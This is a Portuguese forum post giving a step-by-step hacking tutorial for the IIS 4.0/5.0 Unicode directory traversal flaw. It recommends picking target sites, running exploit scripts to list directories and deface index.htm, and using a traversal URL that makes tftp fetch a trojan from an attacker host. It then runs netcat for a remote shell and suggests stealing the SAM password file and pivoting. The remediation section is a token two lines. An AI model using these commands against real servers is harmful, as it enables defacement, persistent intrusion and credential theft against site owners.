Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.



 
InícioInício  PortalPortal  Últimas imagensÚltimas imagens  ProcurarProcurar  RegistarRegistar  EntrarEntrar  


Compartilhe | 
 

 Falhas do Unicode

Ver o tópico anterior Ver o tópico seguinte Ir para baixo 
AutorMensagem
Juninho

Juninho

Mensagens : 527
Pontos : 76381
Data de inscrição : 01/09/2010
Idade : 25
Localização : Santa Catarina-Navegantes

Falhas do Unicode Empty
MensagemAssunto: Falhas do Unicode   Falhas do Unicode Icon_minitimeQui Set 02, 2010 12:06 am

Aviso:

Todas as dicas contidas nesta área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de trazer as informações para que vocês internautas tenham um conhecimento além do normal e saiba como se defender na internet, portanto eu não me responsabilizo por qualquer ato imbecil que você venha a fazer com as informações aqui contidas.

Tentaremos aqui desenvolver um paper explicando passo-à-passo de como um "hacker" faz para obter acesso num servidor rodando WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal vulnerável e como corrigir essa vulnerabilidade.

Obs: esta técnica já é bem velhinha

Segue abaixo as versões dos Sistemas Operacionais e Programas Vulneráveis.

::Vulnerável:
::Microsoft IIS 5.0
+Microsoft Windows NT 2000
::Microsoft IIS 4.0
- Microsoft Windows NT 4.0
+Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0

Vamos ao que interessa

INDICE

1º Procurar por um host vulnerável.
2º Testar se o host é realmente vulnerável.
2.1 Fazer um scanner no host alvo.
2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está vulnerável ou não.
3º Listar os arquivos e pastas contidos no servidor vulnerável.
4º Alterar o conteúdo do site do host vulnerável.
5º TÉCNICAS DE HAXORS. ;-)
6º AGORA VOCÊ É UM HACKER. OU NÃO?
7º MAIS EXPLOITS.
8º CORREÇÃO.


1º) Procurar por um host vulnerável

Geralmente os hosts mais procurados são os mais conhecidos, como sites do governo e empresas nacionalmente e mundialmente conhecidas. Mas se você quer dar uma de "hacker" pegue uma hp bem fulerinha..

2º) Testar se o host é realmente vulnerável.

Existem duas maneiras básicas.

2.1 Fazer um scanner no host alvo.

Existem scanners que vasculham servidores e serviços que estão sendo executados. Esses scanners verificam se há algum serviço vulnerável, que ainda não foi corrigido. Para testar essa vulnerabilidade existem scanners tanto para windows quanto pra linux.
Para windows você pode obter o SSS - Security Shadow Scanner (já vem com seu crack dentro do .zip)
Para linux um scanner feito perl que quando encontra um HOST vulnerável ele inidica o url de onde pode-se obter o exploit para explorar essa vulnerabilidade.

Segue abaixo como usá-los:

- SSS (Security Shadow Scanner) Não há mistério de como utilizá-lo. Basta preencher o campo com o IP ou HOST do alvo e iniciar o "scanneamento". Quando encontrar ele colocará em vermelho um aviso dizendo que o HOST está vulnerável ao msdac.dll.

- unicheck.pl - Veja o que acontece quando ele acha um HOST vulnerável.
perl unicheck.pl XXX.XXX.XXX.XXX:80
- Pode ver que ele avisa que o host é vulnerável. THIS HOST IS VULNERABLE :-).
Avisa onde encotrar o exploit para explorar a vulnerabilidade. http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl

2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está vulnerável ou não..

Agora iremos testar o exploit no nosso host alvo.
"dir c:inetpub"

Como pode ver acima, foi listado os diretórios dentro do diretório c:inetpub. Assim o "hacker" tem acesso à todo o seus arquivos, podendo assim alterar o site da empresa que infelizmente não tem uma equipe separada da equipe de administração responsável pela segurança da empresa, que não só se limita à segurança virtual. Como o "hacker" pode ler o diretório "c:inetpub" ele também pode ter acesso ao diretório padrão do website "c:inetpubwwwroot" ou outro diretório que hospeda os arquivos do site da empresa como pode ver abaixo.

3º) Listar os arquivos e pastas contidos no servidor vulnerável.

Iremos listar todos os arquivos e diretórios dentro de uma determinada pasta.>
perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot"

4º) Alterar o conteúdo do site do host vulnerável.

perl unicodexecute.pl www.host-alvo.com.br:80 ''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''
Pronto... agora você alterou o site da empresa que encontrou vulnerável. Quando for acessar o site da empresa que encontrou vulnerável você encontrará a seguinte mensagem no site:
" SITE HACKED BY Remote Menace! "
É assim que praticamente o mundo inteiro está sendo invadido. :-)

5º) TÉCNICAS DE HAXORS

Bom..
. agora varia de pessoa para pessoa, conheceimento para conhecimento, criatividade para criatividade. O jeito de como você pode obter maiores informações a partir da exploração da vulnerabilidade do unicode só dependerá de você.

Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso já garantido ao servidor você poderá fazer o que bem entende. Geralmente os "hackers" do Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as máquinas que eles conseguem invadir. De certa forma isso é muito bom, pois o que parece é que eles querem somente manifestar o seu descontentamento com o governo e a administração que o Brasil tem. Não que isso seja certo ou que concordamos com o que eles fazem. Infelizmente as pessoas ainda não tem conhecimento do que acontece e o que realmente é o underground e mesmo o que é um HACKER no sentido profundo.


Para você obter um maior acesso à rede, ou seja, conseguir acesso à outras máquinas, outros tipos de acessos, abrir um terminal remoto e até mesmo continuar tendo acesso à máquina, você precisa fazer algumas coisas, mesmo porque o servidor não ficará vulnerável para sempre.

Você pode utilizar ferramentas que já vem instaladas por default (padrão) no Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui é utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar tendo acesso à máquina mesmo depois de sua correção.

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"
+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe
.
agora rode o trojan com:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe


Bom...
Agora você instalou o nc no servidor, poderá abrir um terminal remoto no Windows NT, tendo acesso completo ao sistema.

Como foi dito antes, depende de você continuar tendo acesso ao servidor. E essas técnicas estão sendo aprimoradas a cada dia. Você acha que pode conseguir ter acesso ao arquivo SAM? Você pode descriptografar as senhas dos usuários? Você pode utilizar o terminal que você abriu e tentar ter acesso à outras máquinas para não haver um reastreamento direto para sua máquina?Você pode conseguir acesso à rede interna (10.0.0.0 por exemplo) se houver? Você pode sniffar a rede a partir dessa máquina e obter acesso às outras máquinas?

Como pode ver... pode se fazer MUITA coisa além de modificar uma página apartir de um bug que CENTENAS de servidores ainda continuam vulneráveis por todo o mundo.

6º) AGORA VOCÊ É UM HACKER. OU NÃO?


Você se considera um hacker?
Bom...

7º) MAIS EXPLOITS.

Mais exploits:


iis-zang.c
iis-zang.exe
iis-zang.obsd
iis-zang.linux
unicodecheck.pl
unicodexecute.pl
unicodexecute2.pl



8º) CORREÇÃO.

Contratar um Security Officer para cuidar da segurança da sua empresa.
Se manter o mais atualizado possível.

Internet Informatio Server 4.0
http://www.microsoft.com/ntserver/nts/downloads/

Internet Informatio Server 5.0
http://www.microsoft.com/ntserver/nts/downloads/
Ir para o topo Ir para baixo
http://www.juninnnxd.blogspot.com
 

Falhas do Unicode

Ver o tópico anterior Ver o tópico seguinte Ir para o topo 

 Tópicos semelhantes

+
Página 1 de 1

Permissões neste sub-fórumNão podes responder a tópicos
 :: Consoles :: PC-
Ir para:  

Total De Visitas desde 21/07/2008

Contador de visitas
Forumeiros.com | ©phpBB | Fórum gratuito de ajuda | Denunciar um abuso | Fórum grátis